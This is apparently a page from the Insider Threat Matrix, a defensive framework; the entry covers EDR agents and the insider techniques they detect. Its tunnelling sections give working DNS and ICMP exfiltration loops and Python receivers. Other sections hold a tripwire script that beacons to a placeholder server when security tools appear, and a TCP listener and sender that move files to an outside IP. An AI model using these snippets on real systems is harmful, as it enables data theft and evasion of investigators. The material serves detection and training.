
Insider Threat Matrix™

  • ID: DT046
  • Created: 2nd June 2024
  • Updated: 19th July 2024
  • Platforms: Windows, Linux, macOS
  • Contributor: The ITM Team

Agent Capable of Endpoint Detection and Response

An agent capable of Endpoint Detection and Response (EDR) is a software agent installed on an organization's endpoints (such as laptops and servers) that, at a minimum, records operating system, application, and network activity on the endpoint.

 

Typically, EDR operates in an agent/server model: agents automatically send logs to a server, which correlates them against a rule set. That rule set is used to surface potential security-related events that can then be analyzed.

 

An EDR agent typically also provides some form of remote shell capability, allowing a user of the EDR platform to open a remote shell session on a target endpoint for incident response purposes. Most EDR agents can also remotely isolate an endpoint, blocking all network activity on it other than the traffic required for the EDR platform itself to operate.

Sections

ID Name Description
ME003 Installed Software

A subject can leverage software approved for installation or software that is already installed.

ME006 Web Access

A subject can access the web with an organization device.

ME007 Privileged Access

A subject has privileged access to devices, systems or services that hold sensitive information.

ME009 FTP Servers

A subject is able to access external FTP servers.

ME010 SSH Servers

A subject is able to access external SSH servers.

AF002 Clear Operating System Logs

A subject clears operating system logs to hide evidence of their activities.

AF009 Log Tampering

A subject may attempt to modify log files, as opposed to deleting them, to remove evidence of their actions.

AF013 Delete User Account

A subject may delete a user account to obscure their activities and remove all files associated with that user.

PR019 Private / Incognito Browsing

Private browsing, also known as 'incognito mode' among other terms, is a feature in modern web browsers that prevents the storage of browsing history, cookies, and site data on a subject's device. When private browsing is enabled, it ensures any browsing activity conducted during the browser session is not saved to the browser history or cache.

 

A subject can use private browsing to conceal their actions in a web browser, such as navigating to unauthorized websites, downloading illicit materials, uploading corporate data or conducting covert communications, thus leaving minimal traces of their browsing activities on a device and frustrating forensic recovery efforts.

PR020 Data Obfuscation

Data obfuscation is the act of deliberately obscuring or disguising data to avoid detection and/or hinder forensic analysis. A subject may obscure data in preparation to exfiltrate the data.

PR021 Network Scanning

A subject conducts a scan of a network to identify additional systems, or services running on those systems.

IF017 Excessive Personal Use

A subject uses organizational resources, such as internet access, email, or work devices, for personal activities both during and outside work hours, exceeding reasonable personal use. This leads to reduced productivity, increased security risks, and the potential mixing of personal and organizational data, ultimately affecting the organization’s efficiency and overall security.

IF018 Sharing on AI Chatbot Platforms

A subject interacts with a public Artificial Intelligence (AI) chatbot (such as ChatGPT and xAI Grok), leading to the intentional or unintentional sharing of sensitive information.

AF016 Uninstalling Software

The subject uninstalls software, which may also remove relevant artifacts from the system's disk, such as registry keys or files necessary for the software to run, preventing them from being used by investigators to track activity.

PR023 Suspicious Web Browsing

A subject engages in web searches that may indicate research or information gathering related to potential infringement or anti-forensic activities. Examples include searching for software that could facilitate data exfiltration, methods for deleting or modifying system logs, or techniques to evade security controls. Such activity could signal preparation for a potential insider event.

AF017 Use of a Virtual Machine

The subject uses a virtual machine (VM) to contain artifacts of forensic value within the virtualized environment, preventing them from being written to the host file system. This strategy helps to obscure evidence and complicate forensic investigations.
 

By running a guest operating system within a VM, the subject can potentially evade detection by security agents installed on the host operating system, as these agents may not have visibility into activities occurring within the VM. This adds an additional layer of complexity to forensic analysis, making it more challenging to detect and attribute malicious activities.

IF020 Unauthorized VPN Client

The subject installs and uses an unapproved VPN client, potentially violating organizational policy. By using a VPN service not controlled by the organization, the subject can bypass security controls, reducing the security team’s visibility into network activity conducted through the unauthorized VPN. This could lead to significant security risks, as monitoring and detection mechanisms are circumvented.

PR025 File Download

The subject downloads one or more files to a system to access the file or prepare for exfiltration.

IF001 Exfiltration via Web Service

A subject uses an existing, legitimate external web service to exfiltrate data.

MT021 Conflicts of Interest

A subject may be motivated by personal, financial, or professional interests that directly conflict with their duties and obligations to the organization. This inherent conflict of interest can lead the subject to engage in actions that compromise the organization’s values, objectives, or legal standing.

 

For instance, a subject who serves as a senior procurement officer at a company may have a financial stake in a vendor company that is bidding for a contract. Despite knowing that the vendor's offer is subpar or overpriced, the subject might influence the decision-making process to favor that vendor, as it directly benefits their personal financial interests. This conflict of interest could lead to awarding the contract in a way that harms the organization, such as incurring higher costs, receiving lower-quality goods or services, or violating anti-corruption regulations.

 

The presence of a conflict of interest can create a situation where the subject makes decisions that intentionally or unintentionally harm the organization, such as promoting anti-competitive actions, distorting market outcomes, or violating regulatory frameworks. While the subject’s actions may be hidden behind professional duties, the conflict itself acts as the driving force behind unethical or illegal behavior. These infringements can have far-reaching consequences, including legal ramifications, financial penalties, and damage to the organization’s reputation.

ME024 Access

A subject holds access to both physical and digital assets that can enable insider activity. This includes systems such as databases, cloud platforms, and internal applications, as well as physical environments like secure office spaces, data centers, or research facilities. When a subject has access to sensitive data or systems—especially with broad or elevated privileges—they present an increased risk of unauthorized activity.

 

Subjects in roles with administrative rights, technical responsibilities, or senior authority often have the ability to bypass controls, retrieve restricted information, or operate in areas with limited oversight. Even standard user access, if misused, can facilitate data exfiltration, manipulation, or operational disruption. Weak access controls—such as excessive permissions, lack of segmentation, shared credentials, or infrequent reviews—further compound this risk by enabling subjects to exploit access paths that should otherwise be limited or monitored.

 

Furthermore, subjects with privileged or strategic access may be more likely to be targeted for recruitment by external parties to exploit their position. This can include coercion, bribery, or social engineering designed to turn a trusted insider into an active participant in malicious activities.

ME025 Placement

A subject’s placement within an organization shapes their potential to conduct insider activity. Placement refers to the subject’s formal role, business function, or proximity to sensitive operations, intellectual property, or critical decision-making processes. Subjects embedded in trusted positions—such as those in legal, finance, HR, R&D, or IT—often possess inherent insight into internal workflows, organizational vulnerabilities, or confidential information.

 

Strategic placement can grant the subject routine access to privileged systems, classified data, or internal controls that, if exploited, may go undetected for extended periods. Roles that involve oversight responsibilities or authority over process approvals can also allow for policy manipulation, the suppression of alerts, or the facilitation of fraudulent actions.

 

Subjects in these positions may not only have a higher capacity to carry out insider actions but may also be more appealing targets for adversarial recruitment or collusion, given their potential to access and influence high-value organizational assets. The combination of trust, authority, and access tied to their placement makes them uniquely positioned to execute or support malicious activity.

MT007 Resentment

A subject is motivated by resentment towards the organization to access and exfiltrate or destroy data, or otherwise contravene internal policies.

MT010 Self Sabotage

A subject accesses and exfiltrates or destroys sensitive data or otherwise contravenes internal policies with the aim to be caught and penalised.

MT006 Third Party Collusion Motivated by Personal Gain

A subject is recruited by a third party to access and exfiltrate or destroy sensitive data, or otherwise contravene internal policies, in exchange for personal gain.

MT012 Coercion

A subject is persuaded against their will to access and exfiltrate or destroy sensitive data, or conduct some other act that harms or undermines the target organization. 

IF012 Public Statements Resulting in Brand Damage

A subject makes comments either in-person or online that can damage the organization's brand through association.

MT022 Boundary Testing

The subject deliberately pushes or tests organizational policies, rules, or controls to assess tolerance levels, detect oversight gaps, or gain a sense of impunity. While initial actions may appear minor or exploratory, boundary testing serves as a psychological and operational precursor to more serious misconduct.

 

Characteristics

  • Motivated by curiosity, challenge-seeking, or early-stage dissatisfaction.
  • Actions often start small: minor policy violations, unauthorized accesses, or circumvention of procedures.
  • Rationalizations include beliefs that policies are overly rigid, outdated, or unfair.
  • Boundary testing behavior may escalate if it is unchallenged, normalized, or inadvertently rewarded.
  • Subjects often seek to gauge the likelihood and severity of consequences before considering larger or riskier actions.
  • Testing may be isolated or gradually evolve into opportunism, retaliation, or deliberate harm.

 

Example Scenario

A subject repeatedly circumvents minor IT security controls (e.g., bypassing content filters, using personal devices against policy) without immediate consequences. Encouraged by the lack of enforcement, the subject later undertakes unauthorized data transfers, rationalizing the behavior based on perceived inefficiencies and low risk of detection.

PR026 Remote Desktop (RDP)

The subject initiates configuration or usage of Remote Desktop Protocol (RDP) to enable remote control of an endpoint or server, typically for purposes not sanctioned by the organization. This activity may include enabling RDP settings through system configuration, altering firewall rules, adding users to RDP groups, or initiating browser-based remote access sessions. While RDP is commonly used for legitimate administrative and support purposes, its unauthorized configuration is a well-documented preparatory behavior preceding data exfiltration, sabotage, or persistent unauthorized access.

 

RDP can be enabled through local system settings, remote management tools, or even web-based services that proxy or tunnel RDP traffic through HTTPS. Subjects may configure RDP access for themselves, for a secondary device, or to facilitate third-party (external) involvement in insider threat activities.
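
As one concrete illustration (an assumption for this sketch rather than content from the framework), the Windows registry value that governs inbound RDP can be read programmatically; the same check is useful to an investigator auditing for RDP enabled outside of change control:

# Sketch: check whether inbound Remote Desktop has been enabled on a Windows host
# by reading fDenyTSConnections (0 = connections allowed, 1 = denied).
# Windows-only; uses the standard-library winreg module.
import winreg

KEY_PATH = r"SYSTEM\CurrentControlSet\Control\Terminal Server"

with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY_PATH) as key:
    value, _ = winreg.QueryValueEx(key, "fDenyTSConnections")

print("RDP enabled" if value == 0 else "RDP disabled")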

IF007.002 Streaming Copyrighted Material

A subject accesses a website that allows for the unauthorized streaming of copyrighted material.

ME006.001 Webmail

A subject can access personal webmail services in a browser.

ME006.002 Cloud Storage

A subject can access personal cloud storage in a browser.

ME006.003 Inappropriate Websites

A subject can access websites containing inappropriate content.

ME006.004 Note-Taking Websites

A subject can access external note-taking websites (such as Evernote).

ME006.005 Messenger Services

A subject can access external messenger web-applications with the ability to transmit data and/or files.

ME003.011 Screen Sharing Software

A subject has access to or can install screen sharing software which can be used to capture images or other information from a target system.

ME006.006 Code Repositories

A subject can access websites used to access or manage code repositories.

PR020.001 Renaming Files or Changing File Extensions

A subject may rename a file to obscure its content or change the file extension to hide the file type. This can aid in avoiding suspicion and bypassing certain security filters and endpoint monitoring tools. For example, renaming a sensitive document from FinancialReport.docx to Recipes.txt before copying it to a USB mass storage device.

IF002.001 Exfiltration via USB Mass Storage Device

A subject exfiltrates data using a USB-connected mass storage device, such as a USB flash drive or USB external hard-drive.

IF002.006 Exfiltration via USB to USB Data Transfer

A USB to USB data transfer cable is a device designed to connect two computers directly together for the purpose of transferring files between them. These cables are equipped with a small electronic circuit to facilitate data transfer without the need for an intermediate storage device. Typically a USB to USB data transfer cable will require specific software to be installed to facilitate the data transfer. In the context of an insider threat, a USB to USB data transfer cable can be a tool for exfiltrating sensitive data from an organization's environment.

IF002.007 Exfiltration via Target Disk Mode

When a Mac is booted into Target Disk Mode (by powering the computer on whilst holding the ‘T’ key), it acts as an external storage device, accessible from another computer via Thunderbolt, USB, or FireWire connections. A subject with physical access to the computer, and the ability to control boot options, can copy any data present on the target disk, bypassing the need to authenticate to the target computer.

AF004.001 Clear Chrome Artifacts

A subject clears Google Chrome browser artifacts to hide evidence of their activities, such as visited websites, cache, cookies, and download history.

AF004.003 Clear Firefox Artifacts

A subject clears Mozilla Firefox browser artifacts to hide evidence of their activities, such as visited websites, cache, cookies, and download history.

AF004.002 Clear Edge Artifacts

A subject clears Microsoft Edge browser artifacts to hide evidence of their activities, such as visited websites, cache, cookies, and download history.

IF008.003 Terrorist Content

A subject accesses, possesses and/or distributes materials that advocate, promote, or incite unlawful acts of violence intended to further political, ideological or religious aims (terrorism).

IF008.004 Extremist Content

A person accesses, possesses, or distributes materials that advocate, promote, or incite extreme ideological, political, or religious views, often encouraging violence or promoting prejudice against individuals or groups.

IF001.005 Exfiltration via Note-Taking Web Services

A subject uploads confidential organization data to a note-taking web service, such as Evernote. The subject can then access the confidential data outside of the organization from another device. Examples include (URLs have been sanitized):

  • hxxps://www.evernote[.]com
  • hxxps://keep.google[.]com
  • hxxps://www.notion[.]so
  • hxxps://www.onenote[.]com
  • hxxps://notebook.zoho[.]com

ME006.007 Text Storage Websites

A subject can access external text storage websites, such as Pastebin.

IF004.005 Exfiltration via Protocol Tunneling

A subject exfiltrates data from an organization by encapsulating or hiding it within an otherwise legitimate protocol. This technique allows the subject to covertly transfer data, evading detection by standard security monitoring tools. Commonly used protocols, such as DNS and ICMP, are often leveraged to secretly transmit data to an external destination.

DNS Tunneling (Linux)
A simple example of how DNS tunneling might be achieved with 'Living off the Land' binaries (LoLBins) in Linux:
 

Prerequisites:

  • A domain the subject controls or can use for DNS queries.
  • A DNS server to receive and decode the DNS queries.

 

Steps:

1. The subject uses xxd to create a hex dump of the file they wish to exfiltrate, stripping the newlines so the hex forms a single string. For example, if the file is secret.txt:

 

xxd -p secret.txt | tr -d '\n' > secret.txt.hex
 

2. The subject splits the hexdump into manageable chunks that can fit into DNS query labels (each label can be up to 63 characters, but it’s often safe to use a smaller size, such as 32 characters):

 

split -b 32 secret.txt.hex hexpart_

 

3. The subject uses dig to send the data in DNS TXT queries. Looping through the split files and sending each chunk as the subdomain of example.com in a TXT record query:

 

for part in hexpart_*; do
   h=$(cat $part)
   dig txt $h.example.com
done

 

On the DNS server they control, the subject captures the incoming DNS TXT record queries and decodes the reassembled hex data from the subdomain labels of those queries.
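
A minimal sketch of what that receiving side might look like, assuming the subject controls example.com, the scapy package is installed on the capture host, the script runs with root privileges, and queries arrive in order (real tooling would add sequencing and deduplication):

# Sketch: capture DNS queries for the controlled domain and rebuild the hex dump.
from scapy.all import sniff, DNSQR

DOMAIN = b"example.com."
hex_chunks = []

def handle(pkt):
    if pkt.haslayer(DNSQR):
        qname = pkt[DNSQR].qname  # e.g. b"4d792073...aa.example.com."
        if qname.endswith(DOMAIN) and qname != DOMAIN:
            # Keep only the leading label(s), which carry the hex chunk.
            hex_chunks.append(qname[:-len(DOMAIN)].rstrip(b".").replace(b".", b"").decode())

sniff(filter="udp port 53", prn=handle, timeout=300)

# Reassemble the hex dump and decode it back into the original file.
with open("reassembled.bin", "wb") as out:
    out.write(bytes.fromhex("".join(hex_chunks)))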

 

DNS Tunneling (Windows)
A simple example of how DNS tunneling might be achieved with PowerShell in Windows:

 

Prerequisites:

  • A domain the subject controls or can use for DNS queries.
  • A DNS server, or a script on the subject's server, to capture and decode the DNS queries.

 

Steps:
1. The subject converts the sensitive file to hex:

 

$filePath = "C:\path\to\your\secret.txt"
$hexContent = [System.BitConverter]::ToString([System.IO.File]::ReadAllBytes($filePath)) -replace '-', ''

 

2. The subject splits the hex data into manageable chunks that can fit into DNS query labels (each label can be up to 63 characters, but it’s often safe to use a smaller size, such as 32 characters):

 

$chunkSize = 32
$chunks = $hexContent -split "(.{$chunkSize})" | Where-Object { $_ -ne "" }

 

3. The subject sends the data in DNS TXT queries. Looping through the hex data chunks and sending each chunk as the subdomain of example.com in a TXT record query:

 

$domain = "example.com"

foreach ($chunk in $chunks) {
   $query = "$chunk.$domain"
   Resolve-DnsName -Name $query -Type TXT
}

 

The subject will capture the incoming DNS TXT record queries on the receiving DNS server and decode the reassembled hex data from the subdomain of the query.

 

ICMP Tunneling (Linux)
A simple example of how ICMP tunneling might be achieved with 'Living off the Land' binaries (LOLBins) in Linux:
 

Prerequisites:

  • The subject has access to a server that can receive and process ICMP packets.
  • The subject has root privileges on both client and server machines (as ICMP usually requires elevated permissions).

 

Steps:

1. The subject uses xxd to create a hex dump of the file they wish to exfiltrate, stripping the newlines so the hex forms a single string. For example, if the file is secret.txt:

 

xxd -p secret.txt | tr -d '\n' > secret.txt.hex

 

2. The subject splits the hexdump into manageable chunks. ICMP packets have a payload size limit, so it’s common to use small chunks. The following command will split the hex data into 32-byte chunks:
 

split -b 32 secret.txt.hex hexpart_

 

3. The subject uses ping to send the data in ICMP echo request packets. Loop through the split files and send each chunk as part of the ICMP payload:


DESTINATION_IP="subject_server_ip"
for part in hexpart_*; do
   h=$(cat $part)
   ping -c 1 -p "$h" $DESTINATION_IP
done

 

The subject captures the incoming ICMP packets on the destination server, extracts the data from the packets, and decodes the reassembled hex data.
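
A minimal sketch of the capture side, assuming scapy is installed and the script runs with root privileges on the subject-controlled server; reassembly is left as a manual step because the exact offset of the -p pattern inside the echo payload depends on the ping implementation (a timestamp usually precedes the repeated pattern):

# Sketch: log the payload of incoming ICMP echo requests for offline reassembly.
from scapy.all import sniff, ICMP, Raw

def handle(pkt):
    if pkt.haslayer(ICMP) and pkt[ICMP].type == 8 and pkt.haslayer(Raw):
        # Echo request (type 8); dump the raw payload as hex.
        print(pkt[Raw].load.hex())

sniff(filter="icmp", prn=handle)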

IF011.001 Intentionally Weakening Network Security Controls For a Third Party

The subject intentionally weakens or bypasses network security controls for a third party, such as providing credentials or disabling security controls.

IF018.001 Exfiltration via AI Chatbot Platform History

A subject intentionally submits sensitive information when interacting with a public Artificial Intelligence (AI) chatbot (such as ChatGPT or xAI Grok). They can then access the conversation at a later date, from a different system, to retrieve the information.

IF018.002 Reckless Sharing on AI Chatbot Platforms

A subject recklessly interacts with a public Artificial Intelligence (AI) chatbot (such as ChatGPT and xAI Grok), leading to the inadvertent sharing of sensitive information. The submission of sensitive information to public AI platforms risks exposure due to potential inadequate data handling or security practices. Although some platforms are designed not to retain specific personal data, the reckless disclosure could expose the information to unauthorized access and potential misuse, violating data privacy regulations and leading to a loss of competitive advantage through the exposure of proprietary information.

AF018.001 Endpoint Tripwires

A subject installs custom software or malware on an endpoint, potentially disguising it as a legitimate process. This software includes tripwire logic to monitor the system for signs of security activity.

 

The tripwire software monitors various aspects of the endpoint to detect potential investigations:

  • Security Tool Detection: It scans running processes and monitors new files or services for signatures of known security tools, such as antivirus programs, forensic tools, and Endpoint Detection and Response (EDR) systems.
  • File and System Access: It tracks access to critical files or system directories (e.g., system logs, registry entries) commonly accessed during security investigations. Attempts to open or read sensitive files can trigger an alert.
  • Network Traffic Analysis: The software analyzes network traffic to identify unusual patterns, including connections to Security Operations Centers (SOC) or the blocking of command-and-control servers by network security controls.
  • User and System Behavior: It observes system behavior and monitors logs (such as event logs) that indicate an investigation is in progress, such as switching to an administrative account or modifying security settings (e.g., enabling disk encryption, changing firewall rules).

 

Upon detecting security activity, the tripwire can initiate various evasive responses:

  • Alert the Subject: It covertly sends an alert to an external server controlled by the subject, using common system tools (e.g., curl, wget, or HTTP requests).
  • Modify Endpoint Behavior: It can terminate malicious processes, erase evidence (e.g., logs, browser history, specific files), or restore system and network configurations to conceal signs of tampering.
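
An illustrative sketch of the first two behaviors above (security tool detection and covert alerting), assuming the psutil and requests packages; the watched process names and alert URL are placeholder examples, not indicators taken from any specific tool:

# Sketch: poll running processes for known security tooling and beacon out if any appear.
import time
import psutil
import requests

WATCHED = {"procmon.exe", "autoruns.exe", "velociraptor.exe", "osqueryd"}
ALERT_URL = "https://alerts.example.net/beacon"  # subject-controlled endpoint (placeholder)

def security_tooling_seen():
    names = {(p.info["name"] or "").lower() for p in psutil.process_iter(["name"])}
    return sorted(names & WATCHED)

while True:
    hits = security_tooling_seen()
    if hits:
        # Covertly notify the subject that an investigation may be under way.
        requests.get(ALERT_URL, params={"seen": ",".join(hits)}, timeout=5)
        break
    time.sleep(60)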

AF018.003 Canary Tokens

A subject uses files with canary tokens as a tripwire mechanism to detect the presence of security personnel or investigation activities within a compromised environment. This method involves strategically placing files embedded with special identifiers (canary tokens) that trigger alerts when accessed. For example:

 

The subject creates files containing canary tokens—unique identifiers that generate an alert when they are accessed, opened, or modified. These files can appear as regular documents, logs, configurations, or other items that might attract the attention of an investigator during a security response.

 

The subject strategically places these files in various locations within the environment:

  • Endpoints: Files with canary tokens are stored in directories where digital forensics or malware analysis is likely to occur, such as system logs, user data directories, or registry entries.
  • Cloud Storage: The files are uploaded to cloud storage buckets, virtual machines, or application databases where security teams might search for indicators of compromise.
  • Network Shares: Shared drives and network locations where forensic investigators or security tools may perform scans.

 

Once in place, the canary token within each file serves as a silent tripwire. The token monitors for access and automatically triggers an alert if an action is detected:

  • Access Detection: If a security tool, administrator, or investigator attempts to open, modify, or copy the file, the embedded canary token sends an alert to an external server controlled by the subject.
  • Network Traffic: The token can initiate an outbound network request (e.g., HTTP, DNS) to a specified location, notifying the subject of the exact time and environment where the access occurred.
  • Behavior Analysis: The subject might include multiple canary files, each with unique tokens, to identify the pattern of investigation, such as the sequence of directories accessed or specific file types of interest to the security team.

 

Upon receiving an alert from a triggered canary token, the subject can take immediate steps to evade detection:

  • Alert the Subject: The canary token sends a covert signal to the subject's designated server or communication channel, notifying them of the potential investigation.
  • Halt Malicious Activity: The subject can use this warning to suspend ongoing malicious actions, such as data exfiltration or command-and-control communications, to avoid further detection.
  • Clean Up Evidence: Scripts can be triggered to delete or alter logs, remove incriminating files, or revert system configurations to their original state, complicating any forensic investigation.
  • Feign Normalcy: The subject can restore or disguise compromised systems to appear as though nothing suspicious has occurred, minimizing signs of tampering.

 

By using files with canary tokens as tripwires, a subject can gain early warning of investigative actions and respond quickly to avoid exposure. This tactic allows them to outmaneuver standard security investigations by leveraging silent alerts that inform them of potential security team activity.

IF010.002 Exfiltration via Personal Email

A subject exfiltrates information using a mailbox they own or have access to, either via an email client or webmail. They can then access the mailbox at a later date, from a different system, to retrieve the information.

IF004.006 Exfiltration via Python Listening Service

A subject may employ a Python-based listening service to exfiltrate organizational data, typically as part of a self-initiated or premeditated breach. Python’s accessibility and versatility make it a powerful tool for creating custom scripts capable of transmitting sensitive data to external or unauthorized internal systems.

 

In this infringement method, the subject configures a Python script—often hosted externally or on a covert internal system—to listen for incoming connections. A complementary script, running within the organization’s network (such as on a corporate laptop), transmits sensitive files or data streams to the listening service using common protocols such as HTTP or TCP, or via more covert channels including DNS tunneling, ICMP, or steganographic methods. Publicly available tools such as PyExfil can facilitate these operations, offering modular capabilities for exfiltrating data across multiple vectors.
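
A minimal sketch of that pattern over plain TCP; the host, port, and file path are hypothetical placeholders, and no covert channel, encryption, or error handling is shown:

# Sketch: a listener on the subject-controlled host and a sender run inside the network.
import socket

def listener(output_path="received.bin", bind_addr=("0.0.0.0", 8443)):
    """Runs on the external or covert host; writes whatever it receives to disk."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.bind(bind_addr)
        srv.listen(1)
        conn, _ = srv.accept()
        with conn, open(output_path, "wb") as out:
            while chunk := conn.recv(4096):
                out.write(chunk)

def sender(file_path, server=("203.0.113.10", 8443)):
    """Runs on the corporate endpoint; streams a file to the listener."""
    with socket.create_connection(server) as s, open(file_path, "rb") as f:
        while chunk := f.read(4096):
            s.sendall(chunk)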

 

Examples of Use:

  • A user sets up a lightweight Python HTTP listener on a personal VPS and writes a Python script to send confidential client records over HTTPS.
  • A developer leverages a custom Python socket script to transfer log data to a system outside the organization's network, circumventing monitoring tools.
  • An insider adapts an open-source exfiltration framework like PyExfil to send data out via DNS queries to a registered domain.

 

Detection Considerations:

  • Monitor for local Python processes opening network sockets or binding to uncommon ports.
  • Generate alerts on outbound connections to unfamiliar IP addresses or those exhibiting anomalous traffic patterns.
  • Utilize endpoint detection and response (EDR) solutions to flag scripting activity involving file access and external communications.
  • Inspect Unified Logs, network flow data, and system audit trails for signs of unauthorized data movement or execution of custom scripts.

PR018.007 Downgrading Microsoft Information Protection (MIP) Labels

A subject may intentionally downgrade the Microsoft Information Protection (MIP) label applied to a file in order to obscure the sensitivity of its contents and bypass security controls. MIP labels are designed to classify and protect files based on their sensitivity—ranging from “Public” to “Highly Confidential”—and are often used to enforce Data Loss Prevention (DLP), access restrictions, encryption, and monitoring policies.

 

By reducing a file's label classification, the subject may make the file appear innocuous, thus reducing the likelihood of triggering alerts or blocks by email filters, endpoint monitoring tools, or other security mechanisms.

 

This technique can enable the unauthorized exfiltration or misuse of sensitive data while evading established security measures. It may indicate premeditated policy evasion and can significantly weaken the organization’s data protection posture.

 

Examples of Use:

  • A subject downgrades a financial strategy document from Highly Confidential to Public before emailing it to a personal address, bypassing DLP policies that would normally prevent such transmission.
  • A user removes a classification label entirely from an engineering design document to upload it to a non-corporate cloud storage provider without triggering security controls.
  • An insider reclassifies multiple project files from Confidential to Internal Use Only to facilitate mass copying to a removable USB device.

 

Detection Considerations:

  • Monitoring for sudden or unexplained MIP label downgrades, especially in proximity to data transfer events (e.g., email sends, cloud uploads, USB copies).
  • Correlating audit logs from Microsoft Purview (formerly Microsoft Information Protection) with outbound data transfer events.
  • Use of Data Classification Analytics to detect label changes on high-value files without associated business justification.
  • Reviewing file access and modification logs to identify users who have altered classification metadata prior to suspicious activity.

IF022.002 PII Leakage (Personally Identifiable Information)

PII (Personally Identifiable Information) leakage refers to the unauthorized disclosure, exposure, or mishandling of information that can be used to identify an individual, such as names, addresses, phone numbers, national identification numbers, financial data, or biometric records. In the context of insider threat, PII leakage may occur through negligence, misconfiguration, policy violations, or malicious intent.

 

Insiders may leak PII by sending unencrypted spreadsheets via email, exporting user records from customer databases, misusing access to HR systems, or storing sensitive personal data in unsecured locations (e.g., shared drives or cloud storage without proper access controls). In some cases, PII may be leaked unintentionally through logs, collaboration platforms, or default settings that fail to mask sensitive fields.

 

The consequences of PII leakage can be severe—impacting individuals through identity theft or financial fraud, and exposing organizations to legal penalties, reputational harm, and regulatory sanctions under frameworks such as GDPR, CCPA, or HIPAA.

 

Examples of Infringement:

  • An employee downloads and shares a list of customer contact details without authorization.
  • PII is inadvertently exposed in error logs or email footers shared externally.
  • HR data containing employee National Insurance or Social Security numbers is copied to a personal cloud storage account.

IF022.003 PHI Leakage (Protected Health Information)

PHI Leakage refers to the unauthorized, accidental, or malicious exposure, disclosure, or loss of Protected Health Information (PHI) by a healthcare provider, health plan, healthcare clearinghouse (collectively, "covered entities"), or their business associates. Under the Health Insurance Portability and Accountability Act (HIPAA) in the United States, PHI is defined as any information that pertains to an individual’s physical or mental health, healthcare services, or payment for those services that can be used to identify the individual. This includes medical records, treatment history, diagnosis, test results, and payment details.

 

HIPAA imposes strict regulations on how PHI must be handled, stored, and transmitted to ensure that individuals' health information remains confidential and secure. The Privacy Rule within HIPAA outlines standards for the protection of PHI, while the Security Rule mandates safeguards for electronic PHI (ePHI), including access controls, encryption, and audit controls. Any unauthorized access, improper sharing, or accidental exposure of PHI constitutes a breach under HIPAA, which can result in significant civil and criminal penalties, depending on the severity and nature of the violation.

 

In addition to HIPAA, other countries have established similar protections for PHI. For example, the General Data Protection Regulation (GDPR) in the European Union protects personal health data as part of its broader data protection laws. Similarly, Canada's Personal Information Protection and Electronic Documents Act (PIPEDA) governs the collection, use, and disclosure of personal health information by private-sector organizations. Australia also has regulations under the Privacy Act 1988 and the Health Records Act 2001, which enforce stringent rules for the handling of health-related personal data.

 

This infringement occurs when an insider—whether maliciously or through negligence—exposes PHI in violation of privacy laws, organizational policies, or security protocols. Such breaches can involve unauthorized access to health records, improper sharing of medical information, or accidental exposure of sensitive health data. These breaches may result in severe legal, financial, and reputational consequences for the healthcare organization, including penalties, lawsuits, and loss of trust.

 

Examples of Infringement:

  • A healthcare worker intentionally accesses a patient's medical records without authorization for personal reasons, such as to obtain information on a celebrity or acquaintance.
  • An employee negligently sends patient health data to the wrong recipient via email, exposing sensitive health information.
  • An insider bypasses security controls to access and exfiltrate medical records for malicious use, such as identity theft or selling PHI on the dark web.

IF023.001 Export Violations

Export violations occur when a subject engages in the unauthorized transfer of controlled goods, software, technology, or technical data to foreign persons or destinations, in breach of applicable export control laws and regulations. These laws are designed to protect national security, economic interests, and international agreements by restricting the dissemination of sensitive materials and know-how.

 

Such violations often involve the failure to obtain the necessary export licenses, misclassification of export-controlled items, or the improper handling of technical data subject to regulatory oversight. The relevant legal frameworks may include the International Traffic in Arms Regulations (ITAR), Export Administration Regulations (EAR), and similar export control regimes in other jurisdictions.

 

Insiders may contribute to export violations by sending restricted files abroad, sharing controlled technical specifications with foreign nationals (even within the same organization), or circumventing export controls through the use of unauthorized communication channels or cloud services. These actions are considered violations regardless of the recipient’s sanction status and may occur entirely within legal jurisdictions if export-controlled information is shared with unauthorized individuals.

 

Export violations are distinct from sanction violations in that they pertain specifically to the nature of the goods, data, or services exported, and the mechanism of transfer, rather than the status of the recipient.

Failure to comply with export control laws can result in civil and criminal penalties, loss of export privileges, and reputational damage to the organization.

IF023.002 Sanction Violations

Sanction violations involve the direct or indirect engagement in transactions with individuals, entities, or jurisdictions that are subject to government-imposed sanctions. These restrictions are typically enforced by regulatory bodies such as the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC), the United Nations, the European Union, and equivalent authorities in other jurisdictions.

 

Unlike export violations, which focus on the control of goods and technical data, sanction violations concern the status of the receiving party. A breach occurs when a subject facilitates, authorizes, or executes transactions that provide economic or material support to a sanctioned target—this includes sending payments, delivering services, providing access to infrastructure, or sharing non-controlled information with a restricted party.

 

Insiders may contribute to sanction violations by bypassing compliance checks, falsifying documentation, failing to screen third-party recipients, or deliberately concealing the sanctioned status of a partner or entity. Such conduct can occur knowingly or as a result of negligence, but in either case, it exposes the organization to serious legal and financial consequences.

 

Regulatory enforcement for sanctions breaches may result in significant penalties, asset freezes, criminal prosecution, and reputational damage. Organizations are required to maintain robust compliance programs to monitor and prevent insider-driven violations of international sanctions regimes.

IF023.003 Anti-Trust or Anti-Competition

Anti-trust or anti-competition violations occur when a subject engages in practices that unfairly restrict or distort market competition, violating laws designed to protect free market competition. These violations can involve a range of prohibited actions, such as price-fixing, market division, bid-rigging, or the abuse of dominant market position. Such behavior typically aims to reduce competition, manipulate pricing, or create unfair advantages for certain businesses or individuals.

 

Anti-competition violations may involve insiders leveraging their position to engage in anti-competitive practices, often for personal or corporate gain. These violations can result in significant legal and financial penalties, including fines and sanctions, as well as severe reputational damage to the organization involved.

 

Examples of Anti-Trust or Anti-Competition Violations:

 

  • A subject shares sensitive pricing or bidding information between competing companies, enabling coordinated pricing or market manipulation.
  • An insider with knowledge of a merger or acquisition shares details with competitors, leading to coordinated actions that suppress competition.
  • An employee uses confidential market data to form agreements with competitors on market control, stifling competition and violating anti-trust laws.

 

Regulatory Framework:

 

Anti-trust or anti-competition laws are enforced globally by various regulatory bodies. In the United States, the Federal Trade Commission (FTC) and the Department of Justice (DOJ) regulate anti-competitive behavior under the Sherman Act, the Clayton Act, and the Federal Trade Commission Act. In the European Union, the European Commission enforces anti-trust laws under the Treaty on the Functioning of the European Union (TFEU) and the Competition Act.

ME024.003 Access to Critical Environments (Production and Pre-Production)

